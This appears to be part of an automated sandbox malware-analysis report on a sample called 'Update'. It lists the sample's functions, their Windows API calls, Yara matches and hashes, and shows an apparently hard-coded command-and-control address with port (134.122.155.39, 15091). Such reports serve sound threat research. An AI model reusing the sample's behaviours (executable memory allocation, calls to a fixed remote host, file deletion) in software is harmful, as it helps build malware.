                                                                                            • API String ID: 615853336-0
                                                                                            • Opcode ID: d1b741ba0380379decb7d1b22a74743c7f5a7046d8fc72408544d039aac17dad
                                                                                            • Instruction ID: bc3bc25b656f4220cb3330c80879dd0d2e796a6a37b49e0188f73f67aa49fa4f
                                                                                            • Opcode Fuzzy Hash: d1b741ba0380379decb7d1b22a74743c7f5a7046d8fc72408544d039aac17dad
                                                                                            • Instruction Fuzzy Hash: C5F02D3980425BAAFB00DBA4DC91AAD3AE7EB496C0F300025F4149E0D5DFB1EBC0C740
                                                                                            Function 6C3888B9 Relevance: 4.7, APIs: 3, Instructions: 194sleepCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strlen$Sleep
                                                                                            • String ID:
                                                                                            • API String ID: 2737124692-0
                                                                                            • Opcode ID: f07909a9dc8c423473a4fae108e715d64086076ac504870c4920282daa960c68
                                                                                            • Instruction ID: 373fd525b6312fdb20617fcfad33c762e1bb8ff624fa6968bc7fbbbbc9a89e41
                                                                                            • Opcode Fuzzy Hash: f07909a9dc8c423473a4fae108e715d64086076ac504870c4920282daa960c68
                                                                                            • Instruction Fuzzy Hash: 516106F2C122149BDB10CF64DC407DD7BB5EF49314F25032AE855AB7C1E7759A488BA2
                                                                                            Function 6C383D3E Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 115sleepCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 6C381070: SetFileAttributesA.KERNEL32(?,00000001,?,0000000A,00000000,?,00000022,00000040,00000001), ref: 6C381124
                                                                                              • Part of subcall function 6C381070: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C38115F
                                                                                            • Sleep.KERNEL32(000000C8), ref: 6C383DFC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFileIos_base_dtorSleepstd::ios_base::_
                                                                                            • String ID: $jIk
                                                                                            • API String ID: 3742752172-1761899760
                                                                                            • Opcode ID: 0d5619d87b36b9703cb49e5804fd5135d7373feda3e19297470632517007fe68
                                                                                            • Instruction ID: ae8136fa5cdb8cb2896006b75fdcd68462301e588b25d9df4b5b7ce351eff516
                                                                                            • Opcode Fuzzy Hash: 0d5619d87b36b9703cb49e5804fd5135d7373feda3e19297470632517007fe68
                                                                                            • Instruction Fuzzy Hash: 2451BDB2D053948BDB11CF64C9407EDBBB2BF99304F158299D84867242EB746AC9CF91
                                                                                            Function 034E3160 Relevance: 4.6, APIs: 3, Instructions: 88threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 034E316B
                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 034E3183
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 034E322F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CurrentThread$ExchangeInterlocked
                                                                                            • String ID:
                                                                                            • API String ID: 4033114805-0
                                                                                            • Opcode ID: 8b9aa04f4d560e7b70a6d82f1cb13a92d25c161efee8f80f3ad64f363db38682
                                                                                            • Instruction ID: 2f4812476e61d1df25e515f44726f6f813eeff5157aab60666c233adbb522564
                                                                                            • Opcode Fuzzy Hash: 8b9aa04f4d560e7b70a6d82f1cb13a92d25c161efee8f80f3ad64f363db38682
                                                                                            • Instruction Fuzzy Hash: A7318A78200602AFC719DF69C984A6AB3E9FF44706B10C56EE85A8F614D731E842CB84
                                                                                            Function 034E11B0 Relevance: 4.6, APIs: 3, Instructions: 76memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __floor_pentium4.LIBCMT ref: 034E11E9
                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 034E1226
                                                                                            • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 034E1255
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Virtual$AllocFree__floor_pentium4
                                                                                            • String ID:
                                                                                            • API String ID: 2605973128-0
                                                                                            • Opcode ID: e7f2f8eedbb1eb3c101256404affe82d3d3b39e6ab5439e731512337a0ef64ee
                                                                                            • Instruction ID: ae1eaabc35308d8ac4999b2f5e80a6c0370e9137fb7dca43cdd73e6ffeebabf2
                                                                                            • Opcode Fuzzy Hash: e7f2f8eedbb1eb3c101256404affe82d3d3b39e6ab5439e731512337a0ef64ee
                                                                                            • Instruction Fuzzy Hash: C021D470B403099FDB14DFAED945B6FFBF8EF44706F0085AEE849E6640E631A8148704
                                                                                            Function 100011B0 Relevance: 4.6, APIs: 3, Instructions: 76memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __floor_pentium4.LIBCMT ref: 100011E9
                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 10001226
                                                                                            • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 10001255
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Virtual$AllocFree__floor_pentium4
                                                                                            • String ID:
                                                                                            • API String ID: 2605973128-0
                                                                                            • Opcode ID: 7c8a02711727f2d10f68a554ded2e2394815aae473f82a087a4a6f69535250f3
                                                                                            • Instruction ID: 68b1d39f7c788df30121c4cd9fa650265093b70568a06a1b8131812e88253602
                                                                                            • Opcode Fuzzy Hash: 7c8a02711727f2d10f68a554ded2e2394815aae473f82a087a4a6f69535250f3
                                                                                            • Instruction Fuzzy Hash: EB21D170A00709AFEB14DFA9DC85B9EFBF4FF44745F00C5ADE949E2644EA30A8108790
                                                                                            Function 034E1100 Relevance: 4.6, APIs: 3, Instructions: 66memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __floor_pentium4.LIBCMT ref: 034E112F
                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 034E115F
                                                                                            • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 034E1192
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Virtual$AllocFree__floor_pentium4
                                                                                            • String ID:
                                                                                            • API String ID: 2605973128-0
                                                                                            • Opcode ID: 117d98545c04f59a0122200f59087a9d20be71694050c5dfec2c9ad033f8ed9c
                                                                                            • Instruction ID: f4fc940b72d0aed0843d14b0e2150af274827dbeb30e984d727f485ede8c23fe
                                                                                            • Opcode Fuzzy Hash: 117d98545c04f59a0122200f59087a9d20be71694050c5dfec2c9ad033f8ed9c
                                                                                            • Instruction Fuzzy Hash: 2611D374A40309AFDB109FA9DC85B6EFBF8EF04706F0085AAE959E6240E631A814CB14
                                                                                            Function 10001100 Relevance: 4.6, APIs: 3, Instructions: 66memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __floor_pentium4.LIBCMT ref: 1000112F
                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 1000115F
                                                                                            • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 10001192
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Virtual$AllocFree__floor_pentium4
                                                                                            • String ID:
                                                                                            • API String ID: 2605973128-0
                                                                                            • Opcode ID: 9a9a6dbc4d50d479c69aa6d6b662a424f68bc22565965440325d2e32c173b15c
                                                                                            • Instruction ID: ccfbffdb8cfccccbf267e057733e19453fb850e329b77576dd89ff791b5dae30
                                                                                            • Opcode Fuzzy Hash: 9a9a6dbc4d50d479c69aa6d6b662a424f68bc22565965440325d2e32c173b15c
                                                                                            • Instruction Fuzzy Hash: 77119670A00709ABEB14DFA9DC86B9EF7F4FF04745F008569EE59D2240E671A9148750
                                                                                            Function 034E9DE0 Relevance: 4.5, APIs: 3, Instructions: 39windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 034E9E04
                                                                                            • GdipDisposeImage.GDIPLUS(?), ref: 034E9E18
                                                                                            • GdipDisposeImage.GDIPLUS(?), ref: 034E9E3B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Gdip$DisposeImage$BitmapCreateFromStream
                                                                                            • String ID:
                                                                                            • API String ID: 800915452-0
                                                                                            • Opcode ID: b4e12ac810cf1c626ed3359ec850e4fc4c42292d1d350790e985397cf5dc76ae
                                                                                            • Instruction ID: ed58ba5eb76f44ac00fe4cf2201cce8b44294476b7a279c0f17272ee0ea3944e
                                                                                            • Opcode Fuzzy Hash: b4e12ac810cf1c626ed3359ec850e4fc4c42292d1d350790e985397cf5dc76ae
                                                                                            • Instruction Fuzzy Hash: 91F0A47190021DAB8B10EFA8D848CEFF7B9EB44616B10454AFD05BB390D7354B05CBD4
                                                                                            Function 034E9AC0 Relevance: 4.5, APIs: 3, Instructions: 36COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • EnterCriticalSection.KERNEL32(0350FB64), ref: 034E9ADC
                                                                                            • GdiplusStartup.GDIPLUS(0350FB60,?,?), ref: 034E9B15
                                                                                            • LeaveCriticalSection.KERNEL32(0350FB64), ref: 034E9B26
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterGdiplusLeaveStartup
                                                                                            • String ID:
                                                                                            • API String ID: 389129658-0
                                                                                            • Opcode ID: 4522f29faabf2f6fcc2de0bd05489854a72393a62b9ee6f128e00c7819f75759
                                                                                            • Instruction ID: 1671888e5d186701dfddb8407d861288ed3b1558572ff0736b902a6a89439422
                                                                                            • Opcode Fuzzy Hash: 4522f29faabf2f6fcc2de0bd05489854a72393a62b9ee6f128e00c7819f75759
                                                                                            • Instruction Fuzzy Hash: 42F06D719412099FDB24EFE1E86ABEFB7B8F70430AF40019AD90456291D7BB014DDFA5
                                                                                            Function 6C3A357E Relevance: 4.5, APIs: 3, Instructions: 17fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • DeleteFileW.KERNEL32(6C3951D8,?,6C3951D8,?,?,?,0000000F), ref: 6C3A3586
                                                                                            • GetLastError.KERNEL32(?,6C3951D8,?,?,?,0000000F), ref: 6C3A3590
                                                                                            • __dosmaperr.LIBCMT ref: 6C3A3597
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: DeleteErrorFileLast__dosmaperr
                                                                                            • String ID:
                                                                                            • API String ID: 1545401867-0
                                                                                            • Opcode ID: 9923d09ceeb606e42ea02690fe2ab965eb52f7d7bdd8e7df358de24a841ccbbd
                                                                                            • Instruction ID: 0b622b948d2a6186075e0983680be613ba811515e01a7c623e0122cedfd7eb58
                                                                                            • Opcode Fuzzy Hash: 9923d09ceeb606e42ea02690fe2ab965eb52f7d7bdd8e7df358de24a841ccbbd
                                                                                            • Instruction Fuzzy Hash: 68D0123260850867CF001BF6EC0D9163BACDB833793140655F42EC65D0EF33C851D965
                                                                                            Function 10003200 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 15sleepCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Sleep
                                                                                            • String ID: 134.122.155.39$15091
                                                                                            • API String ID: 3472027048-2986009996
                                                                                            • Opcode ID: 4513ec0b7f0e3245ec74d41a3833d4d9c4567df1cbadf7205a2421670dd53040
                                                                                            • Instruction ID: d4922cd372dd7236031f7b79510b5f56ce2b8beeb54c8bf7640301d5853f9da9
                                                                                            • Opcode Fuzzy Hash: 4513ec0b7f0e3245ec74d41a3833d4d9c4567df1cbadf7205a2421670dd53040
                                                                                            • Instruction Fuzzy Hash: C9D023F0604871CBE928C500DC5447A7375F7C42513940105FC479B144CB74FC08D550
                                                                                            Function 10007156 Relevance: 4.5, APIs: 3, Instructions: 11threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __getptd_noexit.LIBCMT ref: 1000715B
                                                                                              • Part of subcall function 10009896: GetLastError.KERNEL32(00000001,00000000,10007112,10006F0C,00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F), ref: 1000989A
                                                                                              • Part of subcall function 10009896: ___set_flsgetvalue.LIBCMT ref: 100098A8
                                                                                              • Part of subcall function 10009896: __calloc_crt.LIBCMT ref: 100098BC
                                                                                              • Part of subcall function 10009896: DecodePointer.KERNEL32(00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000,?,100099BA), ref: 100098D6
                                                                                              • Part of subcall function 10009896: GetCurrentThreadId.KERNEL32 ref: 100098EC
                                                                                              • Part of subcall function 10009896: SetLastError.KERNEL32(00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000,?,100099BA), ref: 10009904
                                                                                            • __freeptd.LIBCMT ref: 10007165
                                                                                              • Part of subcall function 10009A58: TlsGetValue.KERNEL32(?,?,10007711,00000000,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009A79
                                                                                              • Part of subcall function 10009A58: TlsGetValue.KERNEL32(?,?,10007711,00000000,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009A8B
                                                                                              • Part of subcall function 10009A58: DecodePointer.KERNEL32(00000000,?,10007711,00000000,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009AA1
                                                                                              • Part of subcall function 10009A58: __freefls@4.LIBCMT ref: 10009AAC
                                                                                              • Part of subcall function 10009A58: TlsSetValue.KERNEL32(0000001F,00000000,?,10007711,00000000,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009ABE
                                                                                            • ExitThread.KERNEL32 ref: 1000716E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Value$DecodeErrorLastPointerThread$CurrentExit___set_flsgetvalue__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                                                            • String ID:
                                                                                            • API String ID: 4224061863-0
                                                                                            • Opcode ID: 13d03437f215ed93d40a7d70e196fa756bd6aa96be3d41e5933ba2785ed1d9c5
                                                                                            • Instruction ID: 88b9861ec1dd8ad2b25034eab61c1c94f8d4b81d5381debfb6d8fd2c6c03db1f
                                                                                            • Opcode Fuzzy Hash: 13d03437f215ed93d40a7d70e196fa756bd6aa96be3d41e5933ba2785ed1d9c5
                                                                                            • Instruction Fuzzy Hash: 79C02B3050060C7BFB00A776CC0E95F3A8DDF811C1F668010F80CC5159EE38FC008291
                                                                                            Function 6C384915 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 374fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: DeleteFile
                                                                                            • String ID: '
                                                                                            • API String ID: 4033686569-1997036262
                                                                                            • Opcode ID: e6891a2af0921ce2b8b695b68244b525be374e52c3ce6aec3c1c4da91092cda0
                                                                                            • Instruction ID: 9465b59d5994e9a8c036ee60ab3381751281e80c7bd6d720b0c9375882f21477
                                                                                            • Opcode Fuzzy Hash: e6891a2af0921ce2b8b695b68244b525be374e52c3ce6aec3c1c4da91092cda0
                                                                                            • Instruction Fuzzy Hash: 60C13D72D120204BDB2CDA24CCA47AD7667AF81314F1A8768E469A7FD0DB359EC48F91
                                                                                            Function 6C386840 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • WSAStartup.WS2_32(00000202,?), ref: 6C38685B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Startup
                                                                                            • String ID: 134.122.155.39
                                                                                            • API String ID: 724789610-3106377314
                                                                                            • Opcode ID: e4e24905f9c0b3b0a3c171da6e3b0ea340ea1d8c32de3dc1d449c95b53099aeb
                                                                                            • Instruction ID: 822eeee40e24e1d49ce4e7ecfd70bdcaacb837508d06defa5c26ea0f803134f0
                                                                                            • Opcode Fuzzy Hash: e4e24905f9c0b3b0a3c171da6e3b0ea340ea1d8c32de3dc1d449c95b53099aeb
                                                                                            • Instruction Fuzzy Hash: 7DE065714183419AE300DF11C908BABBBF8EFDA30CF415B0DF4C865081D3B856888B67
                                                                                            Function 030401CB Relevance: 3.3, APIs: 2, Instructions: 267memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 0304022B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564075355.0000000003040000.00000040.00001000.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_3040000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                                            • Instruction ID: e3edd3a083fe51fe594fe4cdc5250798d77fd7487ccd55a6309e2b3344abc351
                                                                                            • Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                                            • Instruction Fuzzy Hash: C8A15DB0A01606AFDB54CFA9C880AAEF7F5FF48305B1885B9E515E7651E730EA50CB90
                                                                                            Function 6C380D50 Relevance: 3.2, APIs: 2, Instructions: 216COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e36b5f64728c11e6898cc46b9ae3fcc362dbf676d2c695999279c5ffc4c7c601
                                                                                            • Instruction ID: fd72e722bdea6dc140325c04f879ec46b6386fc147a1ea78641c577341427134
                                                                                            • Opcode Fuzzy Hash: e36b5f64728c11e6898cc46b9ae3fcc362dbf676d2c695999279c5ffc4c7c601
                                                                                            • Instruction Fuzzy Hash: BD910275A02744CFDB14CF28C880B9ABBB6FF89314F108559E8699B791D730E945CFA1
                                                                                            Function 6C3A121C Relevance: 3.2, APIs: 2, Instructions: 196fileCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 6C3A15C6: GetConsoleOutputCP.KERNEL32(F1BBC535,00000000,00000000,?), ref: 6C3A1629
                                                                                            • WriteFile.KERNEL32(?,6C3A07FB,00000000,6C3AB0A5,00000000,6C3A07FB,00000000,00000000,?,6C3AB0A5,00000000,00000000,6C3AAFE2,6C3A07FB,00000000,?), ref: 6C3A13A1
                                                                                            • GetLastError.KERNEL32(?,6C3AB0A5,00000000,00000000,6C3AAFE2,6C3A07FB,00000000,?,6C3AA281,00000000,6C3A07FB), ref: 6C3A13AB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ConsoleErrorFileLastOutputWrite
                                                                                            • String ID:
                                                                                            • API String ID: 2915228174-0
                                                                                            • Opcode ID: 317165dcb89c261e499fcf8011788ca8c52090a8c81c9f24b7b68d0c7d327494
                                                                                            • Instruction ID: 045d071f493ca98cbd1394d5489b4860cb2a270104cc1bbdd7482e33b0e84a9b
                                                                                            • Opcode Fuzzy Hash: 317165dcb89c261e499fcf8011788ca8c52090a8c81c9f24b7b68d0c7d327494
